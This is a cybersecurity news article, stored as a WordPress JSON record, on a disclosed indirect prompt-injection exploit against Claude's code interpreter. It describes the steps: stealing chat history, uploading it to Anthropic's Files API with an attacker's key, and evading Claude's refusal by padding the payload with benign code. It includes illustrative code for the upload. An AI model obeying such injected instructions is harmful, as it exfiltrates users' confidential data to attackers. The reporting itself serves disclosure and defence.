{"id":5620,"date":"2025-10-31T12:27:43","date_gmt":"2025-10-31T12:27:43","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=5620"},"modified":"2025-10-31T12:27:43","modified_gmt":"2025-10-31T12:27:43","slug":"claude-ai-vulnerability-exposes-enterprise-data-through-code-interpreter-exploit","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=5620","title":{"rendered":"Claude AI vulnerability exposes enterprise data through code interpreter exploit"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<p>A newly disclosed vulnerability in Anthropic\u2019s Claude AI assistant has revealed how attackers can weaponize the platform\u2019s code interpreter feature to silently exfiltrate enterprise data, bypassing even the default security settings designed to prevent such attacks.<\/p>\n<p>Security researcher Johann Rehberger demonstrated that Claude\u2019s code interpreter can be manipulated through indirect prompt injection to steal sensitive information, including chat histories, uploaded documents, and data accessed through integrated services. The attack leveraged Claude\u2019s own API infrastructure to send stolen data directly to attacker-controlled accounts.<\/p>\n<p>The exploit took advantage of a critical oversight in Claude\u2019s network access controls. 
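<\/p>\n<p>Conceptually, the default egress rule is a host allow-list, and a host-based check cannot distinguish a package download from an API call carrying stolen data. The toy sketch below illustrates that failure mode; the exact domain list is an assumption for illustration, not Anthropic\u2019s actual configuration:<\/p>\n<pre class=\"wp-block-code\"><code>ALLOWED_HOSTS = {\n    'registry.npmjs.org',      # npm\n    'pypi.org',                # PyPI\n    'files.pythonhosted.org',  # PyPI package downloads\n    'api.anthropic.com',       # also approved by default -- and abusable\n}\n\ndef egress_allowed(host: str) -> bool:\n    # The filter sees only the destination host, never the intent of the request.\n    return host in ALLOWED_HOSTS\n\nprint(egress_allowed('api.anthropic.com'))  # True: the exfiltration channel stays open\nprint(egress_allowed('attacker.example'))   # False: arbitrary domains are blocked<\/code><\/pre>\n<p>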
While the platform\u2019s default \u201cPackage managers only\u201d setting restricted outbound connections to the domains of approved package registries such as npm and PyPI, it also allowed access to api.anthropic.com, the very endpoint attackers can abuse for data theft.<\/p>\n<h2 class=\"wp-block-heading\">How the attack works<\/h2>\n<p>Rehberger\u2019s attack chain relied on indirect prompt injection, in which malicious instructions are hidden within documents, websites, or other content that users ask Claude to analyze. Once triggered, the exploit executes a multi-stage process:<\/p>\n<p>First, Claude retrieves sensitive data \u2014 such as recent conversation history, via the platform\u2019s newly introduced memory feature \u2014 and writes it to a file in the code interpreter sandbox. The malicious payload then instructs Claude to execute Python code that uploads the file to Anthropic\u2019s Files API, but with a crucial twist: the upload uses the attacker\u2019s API key rather than the victim\u2019s.<\/p>\n<p>\u201cThis code issues a request to upload the file from the sandbox. However, this is done with a twist,\u201d <a href=\"https:\/\/embracethered.com\/blog\/posts\/2025\/claude-abusing-network-access-and-anthropic-api-for-data-exfiltration\/\" target=\"_blank\" rel=\"noopener\">Rehberger wrote in his blog post<\/a>. 
\u201cThe upload will not happen to the user\u2019s Anthropic account, but to the attackers, because it\u2019s using the attacker\u2019s ANTHROPIC_API_KEY.\u201d<\/p>\n<p>The technique allows exfiltration of up to 30MB per file, according to <a href=\"https:\/\/support.claude.com\/en\/articles\/12111783-create-and-edit-files-with-claude#h_27fc9da35e\" target=\"_blank\" rel=\"noopener\">Anthropic\u2019s API documentation<\/a>, with no limit on the number of files that can be uploaded.<\/p>\n<h2 class=\"wp-block-heading\">Bypassing AI safety controls<\/h2>\n<p>Rehberger\u2019s report stated that developing a reliable exploit proved challenging due to Claude\u2019s built-in safety mechanisms. The AI initially refused requests containing plaintext API keys, recognizing them as suspicious. However, Rehberger added that mixing malicious code with benign instructions \u2014 such as simple print statements \u2014 was sufficient to bypass these safeguards.<\/p>\n<p>\u201cI tried tricks like XOR and base64 encoding. None worked reliably,\u201d Rehberger explained. \u201cHowever, I found a way around it\u2026 I just mixed in a lot of benign code, like print (\u2018Hello, world\u2019), and that convinced Claude that not too many malicious things are happening.\u201d<\/p>\n<p>Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025. The company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability.<\/p>\n<p>Rehberger disputed this categorization. \u201cI do not believe this is just a safety issue, but a security vulnerability with the default network egress configuration that can lead to exfiltration of your private information,\u201d he wrote. \u201cSafety protects you from accidents. 
Security protects you from adversaries.\u201d<\/p>\n<p>Anthropic did not immediately respond to a request for comment.<\/p>\n<h2 class=\"wp-block-heading\">Attack vectors and real-world risk<\/h2>\n<p>The vulnerability can be exploited through multiple entry points, according to the blog post. \u201cMalicious actors could embed prompt injection payloads in documents shared for analysis, websites users ask Claude to summarize, or data accessed through Model Context Protocol (MCP) servers and Google Drive integrations,\u201d the post continued.<\/p>\n<p>Organizations using Claude for sensitive tasks \u2014 such as analyzing confidential documents, processing customer data, or accessing internal knowledge bases \u2014 face particular risk. The attack leaves minimal traces, as the exfiltration occurs through legitimate API calls that blend with normal Claude operations.<\/p>\n<p>For enterprises, mitigation options remain limited. Users can disable network access entirely or manually configure allow-lists for specific domains, though this significantly reduces Claude\u2019s functionality. Anthropic recommends monitoring Claude\u2019s actions and manually stopping execution if suspicious behavior is detected \u2014 an approach Rehberger characterized as \u201cliving dangerously.\u201d<\/p>\n<p>The company\u2019s <a href=\"https:\/\/support.claude.com\/en\/articles\/12111783-create-and-edit-files-with-claude#h_27fc9da35e\" target=\"_blank\" rel=\"noopener\">security documentation<\/a> also acknowledges the risk, as Rehberger noted: \u201cThis means Claude can be tricked into sending information from its context (for example, prompts, projects, data via MCP, Google integrations) to malicious third parties.\u201d<\/p>\n<p>However, enterprises may incorrectly assume that the default \u201cPackage managers only\u201d configuration provides adequate protection. Rehberger\u2019s research demonstrated that this assumption is false. 
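<\/p>\n<p>The exfiltration step can be sketched schematically. The function below only builds a description of the upload request rather than sending anything; the endpoint and header names follow Anthropic\u2019s public Files API documentation, while the key and file contents are placeholders. This is an illustrative reconstruction, not the researcher\u2019s withheld exploit code:<\/p>\n<pre class=\"wp-block-code\"><code>def build_upload_request(api_key: str, filename: str, payload: bytes) -> dict:\n    # Describe, without sending, a file upload to Anthropic's Files API.\n    # Whoever owns api_key receives the uploaded file -- the crux of the attack.\n    return {\n        'method': 'POST',\n        'url': 'https://api.anthropic.com/v1/files',\n        'headers': {\n            'x-api-key': api_key,  # attacker's key, not the victim's\n            'anthropic-version': '2023-06-01',\n            'anthropic-beta': 'files-api-2025-04-14',  # beta flag per public docs\n        },\n        'file': (filename, payload),\n    }\n\nreq = build_upload_request('sk-ant-PLACEHOLDER', 'stolen.txt', b'exfiltrated chat history')\nprint(req['url'])  # an allow-listed destination under the default egress setting<\/code><\/pre>\n<p>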
Rehberger has not published the complete exploit code to protect users while the vulnerability remains unpatched. He noted that other domains on Anthropic\u2019s approved list may present similar exploitation opportunities.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>A newly disclosed vulnerability in Anthropic\u2019s Claude AI assistant has revealed how attackers can weaponize the platform\u2019s code interpreter feature to silently exfiltrate enterprise data, bypassing even the default security settings designed to prevent such attacks. Security researcher Johann Rehberger demonstrated that Claude\u2019s code interpreter can be manipulated through indirect prompt injection to steal sensitive [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":5621,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-5620","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/5620"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5620"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/5620\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/5621"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5620"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.
com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5620"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5620"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}